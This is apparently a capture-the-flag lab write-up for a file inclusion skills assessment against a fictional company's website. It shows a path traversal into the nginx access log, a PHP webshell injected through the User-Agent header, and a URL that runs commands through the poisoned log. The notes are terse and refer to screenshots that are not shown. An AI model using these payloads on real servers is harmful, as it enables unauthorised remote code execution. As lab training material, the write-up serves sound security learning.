Skills Assessment

The company INLANEFREIGHT has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.

---

• Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

We can see into the main web index.php a possible FLI into pages, enumerate its -->

I decode it and i can see it into the source code -->

Now, we have another LFI, i will try to do a RCE -->

With it we can see the verison of nginx, this web site use php and nginx, so, we need search of the classic directory of logs -->

../../../../../../../../var/log/nginx/access.log

Now, we can see that it saves the user-agent peticion so...

<?php system($_GET['cmd']);?>

Send the peticion and again see the logs with the webshell command -->

http://94.237.61.242:54849/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id